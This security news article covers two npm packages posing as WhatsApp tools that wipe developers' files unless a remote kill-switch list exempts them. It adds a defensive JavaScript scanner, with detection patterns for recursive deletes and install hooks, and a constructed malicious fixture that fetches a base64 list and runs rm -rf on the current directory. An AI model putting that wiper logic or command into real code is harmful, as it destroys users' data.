Malicious NPM Packages Pose Threat to WhatsApp Developers

Two malicious NPM packages masquerading as WhatsApp development tools have been uncovered by researchers at Socket, deploying destructive data-wiping code aimed at developers’ computers. The packages, named naya-flore and nvlore-hsc, have reportedly been downloaded over 1,100 times since their release last month.

Despite actions taken by Socket, including filing takedown requests and flagging the publisher ‘nayflore’, the malicious packages remain available in the NPM registry. The packages replicate legitimate WhatsApp libraries used for building automation tools around the WhatsApp Business API, now experiencing increased popularity as more businesses adopt WhatsApp’s Cloud API for communication.

Both packages contain a harmful function named ‘requestPairingCode’ that supposedly handles WhatsApp pairing but instead downloads a base64-encoded JSON file listing Indonesian phone numbers; the list acts as a ‘kill switch’ so that the operator is not affected. For every other user, the code executes a command that recursively deletes all files in the current directory, effectively wiping the developer’s system. These findings emphasize the urgency for developers to verify their dependency sources.
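The behaviour described above leaves static footprints that a pre-install audit can look for: a module that pulls in child_process and shells out to a recursive delete, a base64-decoded blob fetched from the network that steers control flow, or a lifecycle script that runs code at install time. The following is an added example of such a heuristic scanner; it is not Socket’s tooling nor code from the packages, the regular expressions are assumed heuristics tuned to the reported behaviour rather than an exhaustive ruleset, and the two package fixtures are constructed inline so the scanner runs offline.

```javascript
// Added example (not Socket's code, not the packages' code): a heuristic scanner
// that flags the patterns described in the article inside an npm package's files.
// Input: an object mapping relative file path -> file contents, so it runs offline.

// npm lifecycle hooks that run code during installation.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Assumed heuristics: each rule is a predicate over one JavaScript file's source.
const RULES = [
  {
    id: 'destructive-shell',
    why: 'imports child_process and shells out to a recursive delete command',
    test: (src) => /child_process/.test(src) &&
      /\brm\s+-[a-zA-Z]*r|\brmdir\s+\/s\b|\bdel\s+\/[fsq]/i.test(src),
  },
  {
    id: 'recursive-fs-delete',
    why: 'calls fs.rm/rmSync with recursive: true',
    test: (src) => /fs\.rm(?:Sync)?\([\s\S]*?recursive\s*:\s*true/.test(src),
  },
  {
    id: 'remote-base64-payload',
    why: 'fetches remote content and base64-decodes it (hidden control data)',
    test: (src) => /\b(?:fetch|axios|https?\.get|got)\b/.test(src) &&
      /['"]base64['"]|\batob\(/.test(src),
  },
];

// Returns a list of findings; an empty list means no heuristic fired.
function scanPackage(files) {
  const findings = [];

  // 1. Lifecycle scripts in package.json run automatically on `npm install`.
  if (files['package.json']) {
    let manifest;
    try { manifest = JSON.parse(files['package.json']); } catch { manifest = {}; }
    const scripts = manifest.scripts || {};
    for (const hook of INSTALL_HOOKS) {
      if (scripts[hook]) {
        findings.push({ file: 'package.json', id: 'install-hook', detail: `${hook}: ${scripts[hook]}` });
      }
    }
  }

  // 2. Source-level rules over every JavaScript file in the package.
  for (const [path, src] of Object.entries(files)) {
    if (!/\.(?:c|m)?js$/.test(path)) continue;
    for (const rule of RULES) {
      if (rule.test(src)) findings.push({ file: path, id: rule.id, detail: rule.why });
    }
  }
  return findings;
}

// Constructed fixture shaped like the reported packages: a pairing helper that
// fetches a base64 JSON allow-list and wipes the directory for everyone else.
const SUSPICIOUS_PACKAGE = {
  'package.json': JSON.stringify({
    name: 'example-wa-helper', version: '1.0.0', main: 'index.js',
    scripts: { postinstall: 'node index.js' },
  }),
  'index.js': [
    "const { exec } = require('child_process');",
    "async function requestPairingCode(phone) {",
    "  const res = await fetch('https://example.invalid/list');",
    "  const allow = JSON.parse(Buffer.from(await res.text(), 'base64').toString());",
    "  if (!allow.includes(phone)) exec('rm -rf ./*');",
    "}",
    "module.exports = { requestPairingCode };",
  ].join('\n'),
};

// Constructed benign fixture: same function name, ordinary HTTPS client, no hooks.
const BENIGN_PACKAGE = {
  'package.json': JSON.stringify({
    name: 'example-wa-client', version: '2.0.0', main: 'index.js',
    scripts: { test: 'node test.js' },
  }),
  'index.js': [
    "const https = require('https');",
    "function requestPairingCode(phone) {",
    "  return https.request({ host: 'example.invalid', path: '/pair/' + phone });",
    "}",
    "module.exports = { requestPairingCode };",
  ].join('\n'),
};

console.log(JSON.stringify(scanPackage(SUSPICIOUS_PACKAGE), null, 2));
console.log('benign findings:', scanPackage(BENIGN_PACKAGE).length);
```

Run against a real package by reading the extracted tarball (for example the output of `npm pack`) into the same path-to-contents object before installing it. The rules are deliberately narrow and will miss obfuscated variants, so treat a hit as a reason to read the package, and a clean result as no more than the absence of these specific patterns.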

Furthermore, Socket found a dormant data exfiltration feature in both packages. Although currently disabled, this feature could potentially extract personal information such as the user’s phone number and device ID if activated. This incident is part of a broader pattern of security threats observed in the software development community. Additionally, Socket reported discovering 11 malicious Go packages that use obfuscation to silently execute harmful scripts on developers’ systems, thus reinforcing the need for caution when sourcing development libraries.